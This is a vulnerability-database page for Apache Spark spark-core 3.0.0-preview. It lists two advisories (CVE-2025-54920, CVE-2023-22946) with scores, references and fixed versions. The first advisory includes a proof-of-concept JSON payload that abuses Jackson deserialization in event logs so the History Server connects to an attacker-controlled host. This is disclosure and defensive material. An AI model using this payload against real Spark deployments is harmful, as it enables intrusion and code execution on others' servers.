Lookup for vulnerable packages by Package URL.

Purlpkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview
Typemaven
Namespaceorg.apache.spark
Namespark-core_2.12
Version3.0.0-preview
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version3.5.7
Latest_non_vulnerable_version3.5.7
Affected_by_vulnerabilities
0
url VCID-1gtx-thb1-9ud6
vulnerability_id VCID-1gtx-thb1-9ud6
summary
Apache Spark: Spark History Server Code Execution Vulnerability
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

## Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.

## Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.

The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.

## Proof of Concept:

1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).

2. Inject the following JSON at the beginning of an event log file:

```
{

  "Event": "org.apache.hive.jdbc.HiveConnection",
  "uri": "jdbc:hive2://<IP>:<PORT>/",
  "info": {
    "hive.metastore.uris": "thrift://<IP>:<PORT>"
  }
}
```
3. Start the Spark History Server with logs pointing to the modified directory.

4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

## Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json
reference_id
reference_type
scores
0
value 6.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-54920
reference_id
reference_type
scores
0
value 0.00498
scoring_system epss
scoring_elements 0.65841
published_at 2026-04-02T12:55:00Z
1
value 0.00498
scoring_system epss
scoring_elements 0.65837
published_at 2026-04-07T12:55:00Z
2
value 0.00498
scoring_system epss
scoring_elements 0.65871
published_at 2026-04-04T12:55:00Z
3
value 0.00674
scoring_system epss
scoring_elements 0.71392
published_at 2026-04-08T12:55:00Z
4
value 0.00674
scoring_system epss
scoring_elements 0.71428
published_at 2026-04-11T12:55:00Z
5
value 0.00674
scoring_system epss
scoring_elements 0.71405
published_at 2026-04-09T12:55:00Z
6
value 0.00674
scoring_system epss
scoring_elements 0.71412
published_at 2026-04-12T12:55:00Z
7
value 0.00674
scoring_system epss
scoring_elements 0.71395
published_at 2026-04-13T12:55:00Z
8
value 0.00718
scoring_system epss
scoring_elements 0.7248
published_at 2026-04-16T12:55:00Z
9
value 0.00718
scoring_system epss
scoring_elements 0.72489
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-54920
2
reference_url https://github.com/apache/spark
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/apache/spark
3
reference_url https://github.com/apache/spark/pull/51312
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://github.com/apache/spark/pull/51312
4
reference_url https://github.com/apache/spark/pull/51323
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://github.com/apache/spark/pull/51323
5
reference_url https://issues.apache.org/jira/browse/SPARK-52381
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://issues.apache.org/jira/browse/SPARK-52381
6
reference_url https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-54920
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-54920
8
reference_url http://www.openwall.com/lists/oss-security/2026/03/13/4
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2026/03/13/4
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2447599
reference_id 2447599
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2447599
10
reference_url https://github.com/advisories/GHSA-jwp6-cvj8-fw65
reference_id GHSA-jwp6-cvj8-fw65
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jwp6-cvj8-fw65
fixed_packages
0
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
aliases CVE-2025-54920, GHSA-jwp6-cvj8-fw65
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1gtx-thb1-9ud6
1
url VCID-1hnx-b71k-mqat
vulnerability_id VCID-1hnx-b71k-mqat
summary
In Apache Spark versions prior to 3.4.0, applications using spark-submit can specify a 'proxy-user' to run as, limiting privileges. The application can execute code with the privileges of the submitting user, however, by providing malicious configuration-related classes on the classpath. This affects architectures relying on proxy-user, for example those using Apache Livy to manage submitted applications.

Update to Apache Spark 3.4.0 or later, and ensure that 
spark.submit.proxyUser.allowCustomClasspathInClusterMode is set to its 
default of "false", and is not overridden by submitted applications.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-22946
reference_id
reference_type
scores
0
value 0.00368
scoring_system epss
scoring_elements 0.58672
published_at 2026-04-07T12:55:00Z
1
value 0.00368
scoring_system epss
scoring_elements 0.58748
published_at 2026-04-18T12:55:00Z
2
value 0.00368
scoring_system epss
scoring_elements 0.58744
published_at 2026-04-16T12:55:00Z
3
value 0.00368
scoring_system epss
scoring_elements 0.58711
published_at 2026-04-13T12:55:00Z
4
value 0.00368
scoring_system epss
scoring_elements 0.58749
published_at 2026-04-11T12:55:00Z
5
value 0.00368
scoring_system epss
scoring_elements 0.58684
published_at 2026-04-02T12:55:00Z
6
value 0.00368
scoring_system epss
scoring_elements 0.5873
published_at 2026-04-12T12:55:00Z
7
value 0.00368
scoring_system epss
scoring_elements 0.58724
published_at 2026-04-08T12:55:00Z
8
value 0.00368
scoring_system epss
scoring_elements 0.58705
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-22946
1
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
2
reference_url https://github.com/apache/spark
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/apache/spark
3
reference_url https://github.com/apache/spark/commit/909da96e1471886a01a9e1def93630c4fd40e74a
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/apache/spark/commit/909da96e1471886a01a9e1def93630c4fd40e74a
4
reference_url https://github.com/apache/spark/pull/39474
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/apache/spark/pull/39474
5
reference_url https://github.com/apache/spark/pull/41428
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/apache/spark/pull/41428
6
reference_url https://github.com/degant/spark/commit/bfba57724d2520e0fcaa7990f7257c21d11cd75a
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/degant/spark/commit/bfba57724d2520e0fcaa7990f7257c21d11cd75a
7
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2023-44.yaml
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2023-44.yaml
8
reference_url https://issues.apache.org/jira/browse/SPARK-41958
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://issues.apache.org/jira/browse/SPARK-41958
9
reference_url https://lists.apache.org/thread/yllfl25xh5tbotjmg93zrq4bzwhqc0gv
reference_id
reference_type
scores
0
value 6.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-21T15:06:49Z/
url https://lists.apache.org/thread/yllfl25xh5tbotjmg93zrq4bzwhqc0gv
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-22946
reference_id CVE-2023-22946
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-22946
11
reference_url https://github.com/advisories/GHSA-329j-jfvr-rhr6
reference_id GHSA-329j-jfvr-rhr6
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-329j-jfvr-rhr6
fixed_packages
0
url pkg:maven/org.apache.spark/spark-core_2.12@3.3.3
purl pkg:maven/org.apache.spark/spark-core_2.12@3.3.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.3.3
aliases BIT-spark-2023-22946, CVE-2023-22946, GHSA-329j-jfvr-rhr6, PYSEC-2023-44
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1hnx-b71k-mqat
Fixing_vulnerabilities
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview